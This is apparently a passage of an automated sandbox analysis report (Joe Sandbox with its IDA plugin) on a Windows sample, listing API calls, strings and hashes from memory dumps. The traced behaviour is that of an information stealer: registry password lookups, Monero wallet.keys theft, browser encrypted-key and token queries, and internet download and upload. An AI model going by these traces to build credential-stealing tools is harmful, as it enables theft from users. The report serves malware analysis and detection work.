                                          • Part of subcall function 00CA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                          • Part of subcall function 00CA6280: HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                          • Part of subcall function 00CA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                          • Part of subcall function 00CA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5318
                                        • lstrlen.KERNEL32(00000000), ref: 00CB532F
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00CB5364
                                        • lstrlen.KERNEL32(00000000), ref: 00CB5383
                                        • lstrlen.KERNEL32(00000000), ref: 00CB53AE
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 38793a2a080443eb886ed8b567dc53e3860da48fa1f9bf018e873e43510ef5e0
                                        • Instruction ID: c0d8a779feb7bfb99dbb311b291ec90b6fa315f771b23ccf4250ca33509cd217
                                        • Opcode Fuzzy Hash: 38793a2a080443eb886ed8b567dc53e3860da48fa1f9bf018e873e43510ef5e0
                                        • Instruction Fuzzy Hash: 9D510F30910148ABCB24FF61CDA6BED777DAF10301F544028F8466B592EF356B49EB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 3d49fc1e0716ce40af5ac29baa35b019441ba7ef02786fb8e22bbc53e07725b8
                                        • Instruction ID: e4cded8e8ce583cc5192867042a4975742fe181ca2ac048119faee5a7a308eaf
                                        • Opcode Fuzzy Hash: 3d49fc1e0716ce40af5ac29baa35b019441ba7ef02786fb8e22bbc53e07725b8
                                        • Instruction Fuzzy Hash: 8FC1A5B590021DABCB14EF60DCD9FEA7378BB54304F044598F50A67182EB71AE89DFA1
                                        APIs
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB42EC
                                        • lstrcat.KERNEL32(?,009DEEB0), ref: 00CB430B
                                        • lstrcat.KERNEL32(?,?), ref: 00CB431F
                                        • lstrcat.KERNEL32(?,009DD608), ref: 00CB4333
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8D90: GetFileAttributesA.KERNEL32(00000000,?,00CA1B54,?,?,00CC564C,?,?,00CC0E1F), ref: 00CB8D9F
                                          • Part of subcall function 00CA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CA9D39
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB93C0: GlobalAlloc.KERNEL32(00000000,00CB43DD,00CB43DD), ref: 00CB93D3
                                        • StrStrA.SHLWAPI(?,009DEF58), ref: 00CB43F3
                                        • GlobalFree.KERNEL32(?), ref: 00CB4512
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                          • Part of subcall function 00CA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                          • Part of subcall function 00CA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                          • Part of subcall function 00CA9AC0: LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB44A3
                                        • StrCmpCA.SHLWAPI(?,00CC08D1), ref: 00CB44C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CB44D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 00CB44E5
                                        • lstrcat.KERNEL32(00000000,00CC0FB8), ref: 00CB44F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 1c2451604507ee0b3141ed2beac3428a36368ef99e62894cdb2cfc44f3a11ede
                                        • Instruction ID: 860cbdd7bcfb00e1f3fb42abdf44a5f965488826117db6b9e921c28aee194a2e
                                        • Opcode Fuzzy Hash: 1c2451604507ee0b3141ed2beac3428a36368ef99e62894cdb2cfc44f3a11ede
                                        • Instruction Fuzzy Hash: 8B712676D00208BBDB14EBA0DC8AFEE777DAB48304F044598F605A7181EA35EB49DF91
                                        APIs
                                          • Part of subcall function 00CA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CA12B4
                                          • Part of subcall function 00CA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00CA12BB
                                          • Part of subcall function 00CA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
                                          • Part of subcall function 00CA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CA12F5
                                          • Part of subcall function 00CA12A0: RegCloseKey.ADVAPI32(?), ref: 00CA12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CA134F
                                        • lstrlen.KERNEL32(?), ref: 00CA135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00CA1377
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(00CC0E1A,009DE528,00CC05AE,?,?,00CA13F9,?,0000001A,00CC0E1A,00000000,?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CB8B86
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CA1465
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 00CA14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9e4eb9bb6b3f6b961be978f6d28589671be57753f0035e696cc65fc2afd4b615
                                        • Instruction ID: e77bf993f30463e6d6b80fb85ae687133386fead516cc11bb2ac742afe8c3151
                                        • Opcode Fuzzy Hash: 9e4eb9bb6b3f6b961be978f6d28589671be57753f0035e696cc65fc2afd4b615
                                        • Instruction Fuzzy Hash: 2E5134B1D501196BCB15FB60DD96FED737CAF54300F4041ACB64AA6082EE306B89DFA6
                                        APIs
                                          • Part of subcall function 00CA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CA733A
                                          • Part of subcall function 00CA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
                                          • Part of subcall function 00CA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
                                          • Part of subcall function 00CA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00CA7452
                                          • Part of subcall function 00CA72D0: HeapFree.KERNEL32(00000000), ref: 00CA7459
                                        • lstrcat.KERNEL32(00000000,00CC17FC), ref: 00CA7606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA7648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00CA765A
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA768F
                                        • lstrcat.KERNEL32(00000000,00CC1804), ref: 00CA76A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00CA76D3
                                        • lstrcat.KERNEL32(00000000,00CC1808), ref: 00CA76ED
                                        • task.LIBCPMTD ref: 00CA76FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 025965903d0f257bec743f894d34386af06c894d5925f570108f08c6704f3814
                                        • Instruction ID: 8d7cc07ef2ed141f60d76601585c9edaf58a100fb505d9ad502b939f007f6357
                                        • Opcode Fuzzy Hash: 025965903d0f257bec743f894d34386af06c894d5925f570108f08c6704f3814
                                        • Instruction Fuzzy Hash: 463110B1D0014EDFCB08EBA5DC9AEFE7779BB46305B18412CF102BB191DA34A94ADB51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009DEC28,00000000,?,00CC0E2C,00000000,?,00000000), ref: 00CB8130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB8137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CB8158
                                        • __aulldiv.LIBCMT ref: 00CB8172
                                        • __aulldiv.LIBCMT ref: 00CB8180
                                        • wsprintfA.USER32 ref: 00CB81AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
                                        • Instruction ID: 31caa6569161740587978e5493ca3644df0d1ef240cc5dc5a8fc61fbd6d16a4f
                                        • Opcode Fuzzy Hash: 02aa4ec15786fc65b60c9de7725aac0d695b0d8af22800933bd8edf38fb274d3
                                        • Instruction Fuzzy Hash: F7211AB1E44258ABDB04DFD5CC49FAEBBBCFB44B10F104619F605BB280D77869058BA5
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                        • InternetOpenA.WININET(00CC0DF7,00000001,00000000,00000000,00000000), ref: 00CA610F
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CA618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CA61B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00CA61DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CA620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00CA6249
                                        • InternetCloseHandle.WININET(?), ref: 00CA6253
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA6260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: bc3c7270a4dcfeefb6dcc32809184173f0dc922a9140c03c6ce9371b0b3107b7
                                        • Instruction ID: 3455068355f9ffbf83a2e50df7f806e9def56375401337a7545763830316ac6a
                                        • Opcode Fuzzy Hash: bc3c7270a4dcfeefb6dcc32809184173f0dc922a9140c03c6ce9371b0b3107b7
                                        • Instruction Fuzzy Hash: B4518FB1900219AFDB20DFA1CC85BEE77B8EB04305F1481A8B605BB1C0DB746A89CF95
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CA733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CA73B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CA740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CA7452
                                        • HeapFree.KERNEL32(00000000), ref: 00CA7459
                                        • task.LIBCPMTD ref: 00CA7555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 5cffa15788e49edb2cb59f32f61a245a852a0411b1f35facf7404e5dcc2471f6
                                        • Instruction ID: 4c77c5266674ff209a54e7396fb56ed6e18b8ef643055c3050cb45fa1ecd55d0
                                        • Opcode Fuzzy Hash: 5cffa15788e49edb2cb59f32f61a245a852a0411b1f35facf7404e5dcc2471f6
                                        • Instruction Fuzzy Hash: 63614AB5D0016D9BDB24DB50CC45BDAB7B8BF49304F0082E9E689A6141EF706BC9DFA1
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • lstrlen.KERNEL32(00000000), ref: 00CABC9F
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00CABCCD
                                        • lstrlen.KERNEL32(00000000), ref: 00CABDA5
                                        • lstrlen.KERNEL32(00000000), ref: 00CABDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 740d9cc1afe19af9fd7d3ab0907cc4adfd91140e37fd28163bd21645571a5927
                                        • Instruction ID: 17a7d4a313252f82803e5d26bf2a4eb4c00ae7458316cd1b547f16f6002e15ca
                                        • Opcode Fuzzy Hash: 740d9cc1afe19af9fd7d3ab0907cc4adfd91140e37fd28163bd21645571a5927
                                        • Instruction Fuzzy Hash: 8FB14E71D10108ABDB14FBA0DCA6EEE733CAF54304F444168F546B6492EF356E49EBA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 9dadcaee960c5d804057cce74ffd9925eb850395d2faaba078e8e03306d805e9
                                        • Instruction ID: 5089442a7dceac6de4932f023595f3739aa79ea86bf6d16276a3521d5de9b3c3
                                        • Opcode Fuzzy Hash: 9dadcaee960c5d804057cce74ffd9925eb850395d2faaba078e8e03306d805e9
                                        • Instruction Fuzzy Hash: 02F0893490425DEFD744DFE1E94976C7B70FB04703F0801ADF605AA290DA746B41DB96
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CA4FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA4FD1
                                        • InternetOpenA.WININET(00CC0DDF,00000000,00000000,00000000,00000000), ref: 00CA4FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CA5011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00CA5041
                                        • InternetCloseHandle.WININET(?), ref: 00CA50B9
                                        • InternetCloseHandle.WININET(?), ref: 00CA50C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
